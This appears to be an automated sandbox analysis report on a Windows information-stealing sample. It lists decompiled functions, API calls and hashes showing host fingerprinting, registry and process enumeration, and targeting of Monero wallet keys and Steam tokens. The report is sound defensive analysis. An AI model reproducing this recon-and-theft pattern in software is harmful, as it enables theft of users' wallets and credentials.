Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: d86db650d3f55d035442dd463adc694dded2445b609c64fc5d1ab5ec45edccca
Instruction ID: b7e0454c757cbaf62378c752cd102064017e501248e7c732b4f8a7fb702e3e42
Opcode Fuzzy Hash: d86db650d3f55d035442dd463adc694dded2445b609c64fc5d1ab5ec45edccca
Instruction Fuzzy Hash: 06E0E671D49348FBE7106BA5DC0AB097678AB04B01F504154F7097B5D0DAF52A409699

Function 00981A10 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

Part of subcall function 0098A9B0: lstrlen.KERNEL32(?,00849138,?,\Monero\wallet.keys,00990E17), ref: 0098A9C5
Part of subcall function 0098A9B0: lstrcpy.KERNEL32(00000000), ref: 0098AA04
Part of subcall function 0098A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AA12

Part of subcall function 0098A8A0: lstrcpy.KERNEL32(?,00990E17), ref: 0098A905

Part of subcall function 00987500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00987542
Part of subcall function 00987500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0098757F
Part of subcall function 00987500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00987603
Part of subcall function 00987500: RtlAllocateHeap.NTDLL(00000000), ref: 0098760A

Part of subcall function 0098A920: lstrcpy.KERNEL32(00000000,?), ref: 0098A972
Part of subcall function 0098A920: lstrcat.KERNEL32(00000000), ref: 0098A982

Part of subcall function 00987690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009876A4
Part of subcall function 00987690: RtlAllocateHeap.NTDLL(00000000), ref: 009876AB

Part of subcall function 009877C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0098DBC0,000000FF,?,00981C99,00000000,?,0084D7E0,00000000,?), ref: 009877F2
Part of subcall function 009877C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0098DBC0,000000FF,?,00981C99,00000000,?,0084D7E0,00000000,?), ref: 009877F9

Part of subcall function 00987850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009711B7), ref: 00987880
Part of subcall function 00987850: RtlAllocateHeap.NTDLL(00000000), ref: 00987887
Part of subcall function 00987850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0098789F

Part of subcall function 009878E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00987910
Part of subcall function 009878E0: RtlAllocateHeap.NTDLL(00000000), ref: 00987917
Part of subcall function 009878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0098792F

Part of subcall function 00987980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00990E00,00000000,?), ref: 009879B0
Part of subcall function 00987980: RtlAllocateHeap.NTDLL(00000000), ref: 009879B7
Part of subcall function 00987980: GetLocalTime.KERNEL32(?,?,?,?,?,00990E00,00000000,?), ref: 009879C4
Part of subcall function 00987980: wsprintfA.USER32 ref: 009879F3

Part of subcall function 00987A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0084E2C0,00000000,?,00990E10,00000000,?,00000000,00000000), ref: 00987A63
Part of subcall function 00987A30: RtlAllocateHeap.NTDLL(00000000), ref: 00987A6A
Part of subcall function 00987A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0084E2C0,00000000,?,00990E10,00000000,?,00000000,00000000,?), ref: 00987A7D

Part of subcall function 00987B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,0084E2C0,00000000,?,00990E10,00000000,?,00000000,00000000), ref: 00987B35

Part of subcall function 00987B90: GetKeyboardLayoutList.USER32(00000000,00000000,009905AF), ref: 00987BE1
Part of subcall function 00987B90: LocalAlloc.KERNEL32(00000040,?), ref: 00987BF9
Part of subcall function 00987B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 00987C0D
Part of subcall function 00987B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00987C62
Part of subcall function 00987B90: LocalFree.KERNEL32(00000000), ref: 00987D22

Part of subcall function 00987D80: GetSystemPowerStatus.KERNEL32(?), ref: 00987DAD

GetCurrentProcessId.KERNEL32(00000000,?,0084D640,00000000,?,00990E24,00000000,?,00000000,00000000,?,0084E308,00000000,?,00990E20,00000000), ref: 0098207E

Part of subcall function 00989470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00989484
Part of subcall function 00989470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 009894A5
Part of subcall function 00989470: CloseHandle.KERNEL32(00000000), ref: 009894AF

Part of subcall function 00987E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00987E37
Part of subcall function 00987E00: RtlAllocateHeap.NTDLL(00000000), ref: 00987E3E
Part of subcall function 00987E00: RegOpenKeyExA.KERNEL32(80000002,0083BF30,00000000,00020119,?), ref: 00987E5E
Part of subcall function 00987E00: RegQueryValueExA.KERNEL32(?,0084D9C0,00000000,00000000,000000FF,000000FF), ref: 00987E7F
Part of subcall function 00987E00: RegCloseKey.ADVAPI32(?), ref: 00987E92

Part of subcall function 00987F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00987FC9
Part of subcall function 00987F60: GetLastError.KERNEL32 ref: 00987FD8

Part of subcall function 00987ED0: GetSystemInfo.KERNEL32(00990E2C), ref: 00987F00
Part of subcall function 00987ED0: wsprintfA.USER32 ref: 00987F16

Part of subcall function 00988100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0084E428,00000000,?,00990E2C,00000000,?,00000000), ref: 00988130
Part of subcall function 00988100: RtlAllocateHeap.NTDLL(00000000), ref: 00988137
Part of subcall function 00988100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00988158
Part of subcall function 00988100: __aulldiv.LIBCMT ref: 00988172
Part of subcall function 00988100: __aulldiv.LIBCMT ref: 00988180
Part of subcall function 00988100: wsprintfA.USER32 ref: 009881AC

Part of subcall function 009887C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00990E28,00000000,?), ref: 0098882F
Part of subcall function 009887C0: RtlAllocateHeap.NTDLL(00000000), ref: 00988836
Part of subcall function 009887C0: wsprintfA.USER32 ref: 00988850

Part of subcall function 00988320: RegOpenKeyExA.KERNEL32(00000000,0084B1C8,00000000,00020019,00000000,009905B6), ref: 009883A4

Part of subcall function 00988320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00988426
Part of subcall function 00988320: wsprintfA.USER32 ref: 00988459
Part of subcall function 00988320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0098847B
Part of subcall function 00988320: RegCloseKey.ADVAPI32(00000000), ref: 0098848C
Part of subcall function 00988320: RegCloseKey.ADVAPI32(00000000), ref: 00988499

Part of subcall function 00988680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,009905B7), ref: 009886CA
Part of subcall function 00988680: Process32First.KERNEL32(?,00000128), ref: 009886DE
Part of subcall function 00988680: Process32Next.KERNEL32(?,00000128), ref: 009886F3
Part of subcall function 00988680: CloseHandle.KERNEL32(?), ref: 00988761

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0098265B

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$Allocate$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$AllocComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID:
API String ID: 3113730047-0
Opcode ID: a81f9363c566732823dcd01a1dfa7978aa6424b31a224e4c8547f9403d253ef6
Instruction ID: 8224712064a0ecb7a445b47f3c83c2e0e5e2bebfe95b6fe26866d057680a4f0b
Opcode Fuzzy Hash: a81f9363c566732823dcd01a1dfa7978aa6424b31a224e4c8547f9403d253ef6
Instruction Fuzzy Hash: 48722F72C14118AAEB19FB90DC91FDE733CAF94300F50429AB51672151EF753B4ACB66

Function 00976D40 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2fed1ceeed8bfee31be28a9c19ccacc5edabbb279689e5c67f9352c52f8e0c6
Instruction ID: 35caf8e3ec8605d2b421f7b316e49ef2be0cfc0ca86d1c8d4b9edd2bcdf1b4a8
Opcode Fuzzy Hash: c2fed1ceeed8bfee31be28a9c19ccacc5edabbb279689e5c67f9352c52f8e0c6
Instruction Fuzzy Hash: F06135B6D00608EFCB14DF94E984BEEB7B4BF48304F108598E419A7281D775AE94DFA1

Function 009870D0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0098718C

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 3722407311-4138519520
Opcode ID: 2bced1adf3766e957344e86eb6aaa22e4023afb1e79eedc96d6199a4599ef528
Instruction ID: 18b1041984503598f60642216dde788fe3ed0bb19e9cb7b24e5ff03322a6246d
Opcode Fuzzy Hash: 2bced1adf3766e957344e86eb6aaa22e4023afb1e79eedc96d6199a4599ef528
Instruction Fuzzy Hash: 73517DB1D042199BDB24FB90DC85BEEF374AF94304F2044A9E215B7281EB74AE88CF55

Function 00985100 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

Part of subcall function 0098A820: lstrlen.KERNEL32(00974F05,?,?,00974F05,00990DDE), ref: 0098A82B
Part of subcall function 0098A820: lstrcpy.KERNEL32(00990DDE,00000000), ref: 0098A885

lstrlen.KERNEL32(00000000,00000000,00990ACA), ref: 0098512A

Strings

steam_tokens.txt, xrefs: 0098513F

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: 3a6d6b3e50faa491711e843ba1bd449f3b9aab906f7be3fc008488b5811c3c91
Instruction ID: 3aad63913c8f705969948066204e1a422db48274822a9d7e0323f2303046f45b
Opcode Fuzzy Hash: 3a6d6b3e50faa491711e843ba1bd449f3b9aab906f7be3fc008488b5811c3c91
Instruction Fuzzy Hash: 2DF01D72D1010867EB08F7B4DC57AED733CABD4300F404259B41662692EF396A09C7A6

Function 00987ED0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00990E2C), ref: 00987F00
wsprintfA.USER32 ref: 00987F16

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 01e4cfbe12c55cc66cf59658bf627b6b0057de3094d31b51c408bfbc8883ad2c
Instruction ID: 2ef63d7f4250ffb8d80d771a747c399f6858c5afbfa906e720d6c3ab6328c262
Opcode Fuzzy Hash: 01e4cfbe12c55cc66cf59658bf627b6b0057de3094d31b51c408bfbc8883ad2c
Instruction Fuzzy Hash: D3F096B1D04208EBCB10DF85DC45FAAF7BCFB44724F000669F51593680D7B569048BD1

Function 0097B4F0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

Part of subcall function 0098A9B0: lstrlen.KERNEL32(?,00849138,?,\Monero\wallet.keys,00990E17), ref: 0098A9C5
Part of subcall function 0098A9B0: lstrcpy.KERNEL32(00000000), ref: 0098AA04
Part of subcall function 0098A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AA12

Part of subcall function 0098A920: lstrcpy.KERNEL32(00000000,?), ref: 0098A972
Part of subcall function 0098A920: lstrcat.KERNEL32(00000000), ref: 0098A982

Part of subcall function 0098A8A0: lstrcpy.KERNEL32(?,00990E17), ref: 0098A905

Part of subcall function 0098A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0098A7E6

lstrlen.KERNEL32(00000000), ref: 0097B9C2
lstrlen.KERNEL32(00000000), ref: 0097B9D6

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
